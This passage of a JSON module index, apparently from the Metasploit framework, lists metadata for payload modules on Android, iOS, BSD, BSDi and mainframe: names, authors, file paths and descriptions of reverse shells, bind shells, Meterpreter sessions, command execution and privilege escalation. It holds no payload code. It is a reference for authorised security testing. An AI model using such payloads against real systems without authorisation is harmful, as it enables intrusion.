"path": "/modules/payloads/singles/android/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "android/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_android/meterpreter_reverse_tcp": {
"name": "Android Meterpreter Shell, Reverse TCP Inline",
"full_name": "payload/android/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
],
"description": "Connect back to the attacker and spawn a Meterpreter shell",
"references": [
],
"platform": "Android",
"arch": "dalvik",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/android/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "android/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_android/shell/reverse_http": {
"name": "Command Shell, Android Reverse HTTP Stager",
"full_name": "payload/android/shell/reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>",
"anwarelmakrahy",
"OJ Reeves"
],
"description": "Spawn a piped command shell (sh). Tunnel communication over HTTP",
"references": [
],
"platform": "Android",
"arch": "dalvik",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/android/reverse_http.rb",
"is_install_path": true,
"ref_name": "android/shell/reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_android/shell/reverse_https": {
"name": "Command Shell, Android Reverse HTTPS Stager",
"full_name": "payload/android/shell/reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>",
"anwarelmakrahy",
"OJ Reeves"
],
"description": "Spawn a piped command shell (sh). Tunnel communication over HTTPS",
"references": [
],
"platform": "Android",
"arch": "dalvik",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/android/reverse_https.rb",
"is_install_path": true,
"ref_name": "android/shell/reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_android/shell/reverse_tcp": {
"name": "Command Shell, Android Reverse TCP Stager",
"full_name": "payload/android/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"mihi",
"egypt <egypt@metasploit.com>"
],
"description": "Spawn a piped command shell (sh). Connect back stager",
"references": [
],
"platform": "Android",
"arch": "dalvik",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/android/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "android/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_apple_ios/aarch64/meterpreter_reverse_http": {
"name": "Apple_iOS Meterpreter, Reverse HTTP Inline",
"full_name": "payload/apple_ios/aarch64/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Apple_iOS",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "apple_ios/aarch64/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_apple_ios/aarch64/meterpreter_reverse_https": {
"name": "Apple_iOS Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/apple_ios/aarch64/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Apple_iOS",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "apple_ios/aarch64/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_apple_ios/aarch64/meterpreter_reverse_tcp": {
"name": "Apple_iOS Meterpreter, Reverse TCP Inline",
"full_name": "payload/apple_ios/aarch64/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Apple_iOS",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "apple_ios/aarch64/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_apple_ios/aarch64/shell_reverse_tcp": {
"name": "Apple iOS aarch64 Command Shell, Reverse TCP Inline",
"full_name": "payload/apple_ios/aarch64/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "Apple_iOS",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-12-19 15:39:29 +0000",
"path": "/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "apple_ios/aarch64/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_apple_ios/armle/meterpreter_reverse_http": {
"name": "Apple_iOS Meterpreter, Reverse HTTP Inline",
"full_name": "payload/apple_ios/armle/meterpreter_reverse_http",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Apple_iOS",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "apple_ios/armle/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_apple_ios/armle/meterpreter_reverse_https": {
"name": "Apple_iOS Meterpreter, Reverse HTTPS Inline",
"full_name": "payload/apple_ios/armle/meterpreter_reverse_https",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Apple_iOS",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "apple_ios/armle/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_apple_ios/armle/meterpreter_reverse_tcp": {
"name": "Apple_iOS Meterpreter, Reverse TCP Inline",
"full_name": "payload/apple_ios/armle/meterpreter_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "Apple_iOS",
"arch": "armle",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-11 09:43:17 +0000",
"path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "apple_ios/armle/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/sparc/shell_bind_tcp": {
"name": "BSD Command Shell, Bind TCP Inline",
"full_name": "payload/bsd/sparc/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "BSD",
"arch": "sparc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/sparc/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/sparc/shell_reverse_tcp": {
"name": "BSD Command Shell, Reverse TCP Inline",
"full_name": "payload/bsd/sparc/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"vlad902 <vlad902@gmail.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "BSD",
"arch": "sparc",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/sparc/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/vax/shell_reverse_tcp": {
"name": "BSD Command Shell, Reverse TCP Inline",
"full_name": "payload/bsd/vax/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"wvu <wvu@metasploit.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "BSD",
"arch": "vax",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-12-17 19:28:07 +0000",
"path": "/modules/payloads/singles/bsd/vax/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/vax/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x64/exec": {
"name": "BSD x64 Execute Command",
"full_name": "payload/bsd/x64/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"joev <joev@metasploit.com>"
],
"description": "Execute an arbitrary command",
"references": [
],
"platform": "BSD",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsd/x64/exec.rb",
"is_install_path": true,
"ref_name": "bsd/x64/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x64/shell_bind_ipv6_tcp": {
"name": "BSD x64 Command Shell, Bind TCP Inline (IPv6)",
"full_name": "payload/bsd/x64/shell_bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>"
],
"description": "Listen for a connection and spawn a command shell over IPv6",
"references": [
],
"platform": "BSD",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x64/shell_bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x64/shell_bind_tcp": {
"name": "BSD x64 Shell Bind TCP",
"full_name": "payload/bsd/x64/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"nemo <nemo@felinemenace.org>",
"joev <joev@metasploit.com>"
],
"description": "Bind an arbitrary command to an arbitrary port",
"references": [
],
"platform": "BSD",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x64/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x64/shell_bind_tcp_small": {
"name": "BSD x64 Command Shell, Bind TCP Inline",
"full_name": "payload/bsd/x64/shell_bind_tcp_small",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "BSD",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb",
"is_install_path": true,
"ref_name": "bsd/x64/shell_bind_tcp_small",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x64/shell_reverse_ipv6_tcp": {
"name": "BSD x64 Command Shell, Reverse TCP Inline (IPv6)",
"full_name": "payload/bsd/x64/shell_reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>"
],
"description": "Connect back to attacker and spawn a command shell over IPv6",
"references": [
],
"platform": "BSD",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x64/shell_reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x64/shell_reverse_tcp": {
"name": "BSD x64 Shell Reverse TCP",
"full_name": "payload/bsd/x64/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"nemo <nemo@felinemenace.org>",
"joev <joev@metasploit.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "BSD",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x64/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x64/shell_reverse_tcp_small": {
"name": "BSD x64 Command Shell, Reverse TCP Inline",
"full_name": "payload/bsd/x64/shell_reverse_tcp_small",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "BSD",
"arch": "x64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb",
"is_install_path": true,
"ref_name": "bsd/x64/shell_reverse_tcp_small",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/exec": {
"name": "BSD Execute Command",
"full_name": "payload/bsd/x86/exec",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"snagg <snagg@openssl.it>",
"argp <argp@census-labs.com>",
"joev <joev@metasploit.com>"
],
"description": "Execute an arbitrary command",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsd/x86/exec.rb",
"is_install_path": true,
"ref_name": "bsd/x86/exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/metsvc_bind_tcp": {
"name": "FreeBSD Meterpreter Service, Bind TCP",
"full_name": "payload/bsd/x86/metsvc_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Stub payload for interacting with a Meterpreter Service",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x86/metsvc_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/metsvc_reverse_tcp": {
"name": "FreeBSD Meterpreter Service, Reverse TCP Inline",
"full_name": "payload/bsd/x86/metsvc_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"hdm <x@hdm.io>"
],
"description": "Stub payload for interacting with a Meterpreter Service",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x86/metsvc_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/shell/bind_ipv6_tcp": {
"name": "BSD Command Shell, Bind TCP Stager (IPv6)",
"full_name": "payload/bsd/x86/shell/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"vlad902 <vlad902@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "Spawn a command shell (staged). Listen for a connection over IPv6",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x86/shell/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/shell/bind_tcp": {
"name": "BSD Command Shell, Bind TCP Stager",
"full_name": "payload/bsd/x86/shell/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Spawn a command shell (staged). Listen for a connection",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/bsd/x86/bind_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x86/shell/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/shell/find_tag": {
"name": "BSD Command Shell, Find Tag Stager",
"full_name": "payload/bsd/x86/shell/find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Spawn a command shell (staged). Use an established connection",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/bsd/x86/find_tag.rb",
"is_install_path": true,
"ref_name": "bsd/x86/shell/find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/shell/reverse_ipv6_tcp": {
"name": "BSD Command Shell, Reverse TCP Stager (IPv6)",
"full_name": "payload/bsd/x86/shell/reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"vlad902 <vlad902@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "Spawn a command shell (staged). Connect back to the attacker over IPv6",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x86/shell/reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/shell/reverse_tcp": {
"name": "BSD Command Shell, Reverse TCP Stager",
"full_name": "payload/bsd/x86/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Spawn a command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/bsd/x86/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x86/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/shell_bind_tcp": {
"name": "BSD Command Shell, Bind TCP Inline",
"full_name": "payload/bsd/x86/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x86/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/shell_bind_tcp_ipv6": {
"name": "BSD Command Shell, Bind TCP Inline (IPv6)",
"full_name": "payload/bsd/x86/shell_bind_tcp_ipv6",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"vlad902 <vlad902@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "Listen for a connection and spawn a command shell over IPv6",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb",
"is_install_path": true,
"ref_name": "bsd/x86/shell_bind_tcp_ipv6",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/shell_find_port": {
"name": "BSD Command Shell, Find Port Inline",
"full_name": "payload/bsd/x86/shell_find_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Spawn a shell on an established connection",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/bsd/x86/shell_find_port.rb",
"is_install_path": true,
"ref_name": "bsd/x86/shell_find_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/shell_find_tag": {
"name": "BSD Command Shell, Find Tag Inline",
"full_name": "payload/bsd/x86/shell_find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Spawn a shell on an established connection (proxy/nat safe)",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsd/x86/shell_find_tag.rb",
"is_install_path": true,
"ref_name": "bsd/x86/shell_find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/shell_reverse_tcp": {
"name": "BSD Command Shell, Reverse TCP Inline",
"full_name": "payload/bsd/x86/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ramon de C Valle <rcvalle@metasploit.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-05-01 04:57:42 +0000",
"path": "/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "bsd/x86/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsd/x86/shell_reverse_tcp_ipv6": {
"name": "BSD Command Shell, Reverse TCP Inline (IPv6)",
"full_name": "payload/bsd/x86/shell_reverse_tcp_ipv6",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"vlad902 <vlad902@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "Connect back to attacker and spawn a command shell over IPv6",
"references": [
],
"platform": "BSD",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb",
"is_install_path": true,
"ref_name": "bsd/x86/shell_reverse_tcp_ipv6",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsdi/x86/shell/bind_tcp": {
"name": "BSDi Command Shell, Bind TCP Stager",
"full_name": "payload/bsdi/x86/shell/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Spawn a command shell (staged). Listen for a connection",
"references": [
],
"platform": "BSDi",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/bsdi/x86/bind_tcp.rb",
"is_install_path": true,
"ref_name": "bsdi/x86/shell/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsdi/x86/shell/reverse_tcp": {
"name": "BSDi Command Shell, Reverse TCP Stager",
"full_name": "payload/bsdi/x86/shell/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>"
],
"description": "Spawn a command shell (staged). Connect back to the attacker",
"references": [
],
"platform": "BSDi",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "bsdi/x86/shell/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsdi/x86/shell_bind_tcp": {
"name": "BSDi Command Shell, Bind TCP Inline",
"full_name": "payload/bsdi/x86/shell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"optyx <optyx@no$email.com>"
],
"description": "Listen for a connection and spawn a command shell",
"references": [
],
"platform": "BSDi",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "bsdi/x86/shell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsdi/x86/shell_find_port": {
"name": "BSDi Command Shell, Find Port Inline",
"full_name": "payload/bsdi/x86/shell_find_port",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"optyx <optyx@no$email.com>"
],
"description": "Spawn a shell on an established connection",
"references": [
],
"platform": "BSDi",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsdi/x86/shell_find_port.rb",
"is_install_path": true,
"ref_name": "bsdi/x86/shell_find_port",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_bsdi/x86/shell_reverse_tcp": {
"name": "BSDi Command Shell, Reverse TCP Inline",
"full_name": "payload/bsdi/x86/shell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"optyx <optyx@no$email.com>"
],
"description": "Connect back to attacker and spawn a command shell",
"references": [
],
"platform": "BSDi",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "bsdi/x86/shell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_cmd/mainframe/apf_privesc_jcl": {
"name": "JCL to Escalate Privileges",
"full_name": "payload/cmd/mainframe/apf_privesc_jcl",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Bigendian Smalls",
"Ayoub"
],
